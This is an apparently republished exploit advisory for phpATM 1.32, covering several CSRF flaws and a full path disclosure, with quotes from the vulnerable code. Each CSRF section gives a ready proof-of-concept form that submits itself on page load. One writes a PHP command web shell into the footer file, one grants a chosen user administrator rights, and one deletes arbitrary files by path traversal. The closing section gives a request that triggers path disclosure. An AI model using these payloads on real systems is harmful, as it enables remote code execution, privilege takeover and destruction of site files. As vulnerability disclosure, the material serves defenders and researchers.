phpATM 1.32 – Multiple Vulnerabilities

  • 作者: Paolo Massenio
    日期: 2016-06-17
  • 类别:
  • 来源:
  • <!--
    Exploit Title : "phpATM <= 1.32 Multiple CSRF Vulnerabilities & Full Path Disclosure Vulnerability"
    Author:Paolo Massenio - pmassenio[AT]gmail
    Vendor:phpATM -
    Version :<= 1.32
    Tested on :Windows 10 with XAMPP
    [1] __CSRF in configure.php__
    phpATM lets the administrator to modify the footer or the header through a specific form located in configure.php.
    	The configure.php page and all of the forms in it are affected by a CSRF bug, so we will focus on the form that 
    	lets you to modify the footer.
    	This section of code is called when this form is submitted:
    	149 case ACTION_SAVEFILE;
    			$filename = getPostVar('filename');
    			$filebody = getPostVar('filebody');
    			if (!isset($filebody))
    			{ break; }
    			$filebody = stripslashes($filebody);
    			$filebody = str_replace("&", "&", $filebody);
    			$filebody = preg_replace('/[^\x09\x0A\x0D\x20-\x7F]/e', '"&#".ord($0).";"', $filebody);
    			fwrite($fp, $filebody);
    			show_default(sprintf($mess[167], $filename));
    	163		break;
    	All the content is saved in the file (e.g. $filename="footer.html").
    	For example, the footer is included in every page by the show_footer_page() function, like in the index.php page:
    	1860 show_footer_page();
    	Let see this function:
    	951 function show_footer_page()
    			global $footerpage, $include_location, $cfg_folder_name; //$footerpage="footer.html"
    			// The copyright info. Please read GPL license if you are planning to remove it.
    			echo "\n<div id=\"phpatm\"><br><a href=\"\" target=\"_blank\" title=\"Powered by PHP Advanced Transfer Manager v".PROGRAM_VERSION."\">Powered by phpATM</a><br></div>\n";
    			// Include the footer page if configured	
    			$footer_path = $include_location.$cfg_folder_name.'/'.$footerpage;
    			if (file_exists($footer_path))
    			{ include($footer_path); }
    			echo "</div></td>\n</tr>\n</table>\n</body>\n</html>";
    	964	}
    	So the footer.html is included! We can write whatever we want. 
    	We can basically inject,through the CSRF, some malicius html code (e.g. persistent XSS)
    	or a malicious PHP code!
    	Below a very simple example that injects malicious PHP code:	
    	<body onload="document.editfile.submit()">
    	<form name="editfile" action="" method="post">
    			<input type="hidden" name="action" value="savefile">
    			<input type="hidden" name="filename" value="footer.htm">
    			<input type="hidden" name="filebody" value='<?php system($_GET["cmd"]); ?>'>
    [2] __CSRF in usrmanag.php (1) change user permission__
    	phpATM lets the administrator to change permission of a generic registered user through a form located in usrmanag.php page.
    	This page and all of the forms in it are affected by a CSRF bug.
    	The code below lets to the evil user to modify the permissions:
    	<body onload="document.useraccount.submit()">
     <form name="useraccount" action="" method="post" >
     <input type="hidden" name="action" value="profile">
     <input type="hidden" name="order" value="name">
     <input type="hidden" name="letter" value="">
     <input type="hidden" name="accpage" value="">
     <input type="hidden" name="username" value="test">
     <input type="hidden" name="typed_email" value="">
    		 <input type="hidden" name="typed_status" value="0"> 
    	username is the name of the evil user
    	typed_email is the email of the evil user
    	typed_status setted to 0 for administrator permissions.
    [3] __CSRF in usrmanag.php (2) - delete any file___
    	phpATM doesn't use any kind of DBMS. The data of the users are collected in some files located in the 'users' folder.
    	Basically all the informations about a specified user (like username, md5 password, email, etc.) are stored in a file named 
    	like the user. 
    	In usrmanag.php the admin can delete an user account. So the system will basically delete the respective file.
    	When the form is submitted, is called the change_account_data() function:
    	function change_account_data()
    		if (isset($deleteaccountcheckbox))
    			if ($deleteaccountcheckbox == "on")
    				unlink("$users_folder_name/$username");// Delete account file
    				if (file_exists("$userstat_folder_name/$username.stat"))
    				{ unlink("$userstat_folder_name/$username.stat"); }// Delete account statistics file
    	There is no sanification of the $username variable, in fact:
    	$username = getPostVar('username');
    	function getPostVar($var_name)
    		if (isset($_POST[$var_name]))
    		{ return $_POST[$var_name]; }
    		{ return $HTTP_POST_VARS[$var_name]; }
    	The form is affected by a CSRF bug, the $username variable isn't saificated, so we can delete
    	any file by sending a malicious form to the logged Admin!
    	Here an example:
    	<body onload="document.useraccount.submit()">
    		<form name="useraccount" action="" method="post" style="margin: 0">
    			<input type="hidden" name="action" value="profile">
    			<input type="hidden" name="username" value="../index.php">
    			<input type="hidden" name="deleteaccountcheckbox" value="on">
    [4] __FPD__
     Simply request the page: http://server/phpATM/index.php?action=view&filename[]=